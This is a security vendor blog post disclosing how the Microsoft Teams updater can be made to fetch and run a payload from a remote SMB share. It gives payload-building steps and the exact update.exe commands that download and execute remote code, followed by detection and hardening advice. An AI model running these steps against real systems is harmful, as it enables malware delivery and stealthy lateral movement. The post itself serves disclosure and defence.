Trustwave Rapid Response: CrowdStrike Falcon Outage Update. Learn More

Trustwave Rapid Response: CrowdStrike Falcon Outage Update. Learn More

Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

Database Security

Prevent unauthorized access and exceed compliance requirements.

Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Offensive Security
Solutions to maximize your security ROI
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

Microsoft Teams Updater Living off the Land


During this global pandemic COVID-19 situation, there has been an increasing trend of video conferencing solutions, Trustwave SpiderLabs are exercising extra vigilance in monitoring the video conferencing traffics. During our threat hunt, we have observed lots of Microsoft Teams updater traffic. Due to the noisy nature of the traffic, there is a possibility that malicious traffic hiding there will evade the analyst's view or even be added to a list of allowed, and therefore unmonitored, list of applications.

Because of this, I reviewed the previous findings on Microsoft Team code execution and found that it was fixed but not completely.


My original finding allowed a malicious actor to use the MS Teams Updater to download any binary or payload they wish. This technique is typically known as Living Off the Land and is especially dangerous, as it uses known, common software to download malware.

The patch previously provided for Teams was to restrict its ability to update via a URL. Instead, the updater allows local connections via a share or local folder for product updates.

Initially, when I observed this finding, I figured it could still be used as a technique for lateral movement, however, I found the limitations added could be easily bypassed by pointing to a remote SMB share.

Legitimate Events:

%localappdata%\Microsoft\Teams\update.exe --update \\fileshare\<redacated>\AppData\Roaming\Microsoft\Teams\DownloadedUpdate
%localappdata%\Microsoft\Teams\update.exe --update \\fileshare\<redacated>\AppData\Roaming\Microsoft\Teams\DownloadedUpdate
%localappdata%\Microsoft\Teams\update.exe --update \\fileshare\<redacated>\AppData\Roaming\Microsoft\Teams\DownloadedUpdate
%localappdata%\Microsoft\Teams\update.exe --update

Current Patch

As per the patch, Microsoft Teams Updater will allow only local network paths to access and update, that means it will detect the string "http/s", ":", "/" and port numbers in the updater URL, blocks and log the activity under %localappdata%\Microsoft\Teams\SquirrelSetup.log




It allows share access in the local UNC format: \\server\

To exploit this an attacker would need to:

  1. Get the file inside the network in an open shared folders
  2. Access the payload from that share to the victim machine

It looks like a complicated scenario and there’s a long road to travel, but we can make it work.

Remote Samba

To reduce the attack steps, an attacker can create a remote rather than local share. This would allow them to download the remote payload and execute rather than trying to get the payload to a local share as an intermediary step.

I did some research on Samba and configured a Samba server for remote, public access. After a successful setup, I initiated the command execution, downloaded remote payload, and executed directly from Microsoft Teams Updater "Update.exe"

Command: Update.exe --update=\\remoteserver\payloadFolder

Vulnerable Endpoint


Offensive Part

To exploit this, a payload that supports the updater framework must be crafted first

Payload creation:

  1. Extract any nupkg package, in my example, Teams-
    1. goto %localappdata%/Microsoft/Teams/packages to pick Microsoft Teams pre-built package
  2. Go to Teams-\lib\net45 and drop your shellcode as 'squirrel.exe' compress the complete folder as 'Teams-'
  3. Calculate the metadata with the command:
    sha1sum Teams- && wc -c < Teams-

    resulting with the output:
    fa8b87f0b995498a6e890c832dcaf968997608d4 Teams- 4695

  4. Create a file named RELEASES and copy the above output and save.
  5. The result will be a main directory containing two files: Teams- and RELEASES.
  6. upload those two files to remote Samba server:




Since it is a Samba server, the server needs to be first authenticated from windows "Run".

Steps to Reproduce:

  1. Go to target application folder "%localappdata%/Microsoft/Teams/" on the victim system
  2. Run the below command:
    update.exe --update=[Samba server contains the above 2 files]
    e.g. update.exe --update=\\remoteserver\payloadFolder

After some seconds (wait for 10-15 seconds), the payload will be downloaded successfully and executed by Microsoft Teams

Affected parameters:

update.exe --update=\\remoteserver\payloadFolder
update.exe --updateRollback=\\remoteserver\payloadFolder

Exploitation Flow:


Proof of concept:


  • Microsoft Teams Update.exe binary would act as LOLbin (Living off the Land binaries)
  • Since the installation is in the local user Appdata folder, no privileged access is needed
  • Attackers can use this to masquerade the traffic (especially for lateral movement)

Trustwave did reach out to Microsoft on this issue and they responded saying:

“Thank you again for submitting this issue to Microsoft. We determined that this behavior is considered to be by design as "we cannot restrict SMB source for –update because we have customers that apparently rely on this (e.g. folder redirection)."

Trustwave Recommendations

From the Threat hunting perspective

  1. Utilize the EDR solutions and look at "update.exe" command lines for suspicious connections
  2. Hunt for squirrel.exe executables and investigate the size of the file, you can use that to differentiate trojan squirrels from the legit squirrel.exe
    • If you are dealing with Microsoft Teams “update.exe”, Validate the size and hash, hunt for any anomalies
  3. Investigate outgoing SMB connections especially from the Microsoft Teams updater update.exe or filter SMB connections entirely at the perimeter if unnecessary
  4. Request customer or IT for any security exclusions placed for Microsoft Teams packages and review the change applied
  5. IT should install the Microsoft Teams under the "Program Files" folder, so an attacker cannot drop and execute the remote payload; this can be carried out by Group policy
  6. Disable any kind of update mechanisms and set a policy that updates should be pushed only by the IT team

Trustwave is exercising extra vigilance in monitoring this kind of traffic. We regularly monitor and improve our threat hunting plans for all global cyber events and all organizations can undertake similar operations within their environment. Contact Trustwave about engaging professional threat hunting.

Latest SpiderLabs Blogs

Cloudy with a Chance of Hackers: Protecting Critical Cloud Workloads

If you've been following along with David's posts, you'll have noticed a structure to the topics: Part I: The Plan, Part II: The Execution and now we move into Part III: Security Operations. Things...

Read More

Trustwave Rapid Response: CrowdStrike Falcon Outage Update

Trustwave is proactively assessing and monitoring our clients who may have been impacted by CrowdStrike’s recently rolled-out update for its Windows users. The critical issue identified with...

Read More

Using AWS Secrets Manager and Lambda Function to Store, Rotate and Secure Keys

When working with Amazon Web Services (AWS), we often find that various AWS services need to store and manage secrets. AWS Secrets Manager is the go-to solution for this. It's a centralized service...

Read More